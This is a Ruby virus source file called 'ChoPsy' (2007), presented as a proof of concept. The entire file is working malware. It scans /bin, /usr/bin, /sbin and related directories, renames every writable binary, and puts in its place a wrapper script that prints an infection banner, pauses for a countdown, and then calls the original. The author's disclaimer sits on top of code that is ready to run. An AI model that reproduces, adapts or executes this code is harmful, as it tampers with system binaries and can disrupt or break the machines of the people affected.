#!/usr/bin/env ruby

# VIRUS - BE AWARE - VIRUS
#
# Name: ChoPsy
# Author: SkyOut
# Date: 2007
# Website: http://wired-security.net/
#
# Description: This virus is nothing more then a simple
# Proof-of-Concept code, that I did due to the fact, that
# I was bored of life ... It will check several directories,
# which are normally the ones on Unix/Linux systems to store
# the binary files. Then it will replace the binary files with
# itself in a way, that it prints out a message to the user and
# after a short countdown linking back to the original binary
# file.
#
# WARNING: This virus has only been hardly tested and under very
# controlled and limited conditions! If you execute it on your
# machine I am NOT responsible for ANY damage, that has been done
# nor the hoster of my site! It is your free choice to use it or
# not, but YOU ARE RESPONSIBLE FOR EVERY ACTION!

require 'ftools'

# The main function, doing several steps:
# -> Moving the binary file "foo" to "foo_"
# -> Creating a new binary file called "foo"
# -> Writing all instructions into this file and finally
#    linking back to the original binary file, called "foo_"
def replacecmd(cmdname, dirpath)
	File.move("#{dirpath}/#{cmdname}", "#{dirpath}/#{cmdname}_")
	oldcmd   = File.open("#{dirpath}/#{cmdname}", File::WRONLY|File::TRUNC|File::CREAT, 0777)

	oldcmd.puts "#!/usr/bin/env ruby\n"

	# Some info text for the infected user
	oldcmd.puts "puts \"\""
	oldcmd.puts "puts \"\\t\\tYour system has been infected with:\""
	oldcmd.puts "puts \"\\t\\t---> C - H - O - P - S - Y <---\""
	oldcmd.puts "puts \"\""
	oldcmd.puts "puts \"\\t\\t>>>> Author: SkyOut\""
	oldcmd.puts "puts \"\\t\\t>>>> Date: 2007\""
	oldcmd.puts "puts \"\\t\\t>>>> Website: core-security.net\""
	oldcmd.puts "puts \"\""

	# A countdown of three seconds will occurr every time
	oldcmd.puts "puts \"Take a moment of patience ...\""
	oldcmd.puts "puts \"Executing in ...\""
	oldcmd.puts "sleep 1"
	oldcmd.puts "puts \"3\""
	oldcmd.puts "sleep 1"
	oldcmd.puts "puts \"2\""
	oldcmd.puts "sleep 1"
	oldcmd.puts "puts \"1\""
	oldcmd.puts "sleep 1"
	oldcmd.puts "puts \"\""

	# Here we link back to the original binary file
	oldcmd.puts "for $args in $* do"
	oldcmd.puts "$argslist = \"#\{$argslist\}\" + \" \" + \"#\{$args\}\""
	oldcmd.puts "end"
	oldcmd.puts "exec \"#{dirpath}/#{cmdname}_ #\{$argslist\}\""

	oldcmd.puts "exit 0"
end

# We create an array used to store the locations, that we
# will test for binary files to be replaced
$binary_dirs = Array.new
$binary_dirs = [ "/bin", "/usr/bin", "/usr/local/bin", "/sbin", "/usr/sbin", "/usr/local/sbin" ]

# We go through the fields in the array
for $dir in $binary_dirs do
	# Check if it's really a directory
	if File.directory?($dir) then
		# Check if we have full write access!
		# Without this everything is useless ...
		if File.writable?($dir) then
			# Open the directory, go through every file and
			# pass the information to our "replacecmd" function
			Dir.open($dir).each do |file|
				# Ignore files ending with "_" and those called "." and ".."
				next if file =~ /^\S+_/ || file == "." || file == ".."
				# Here we go!!!
				replacecmd(file, $dir)
			end
		end
	end
end

# YEEHA! We're done!
exit 0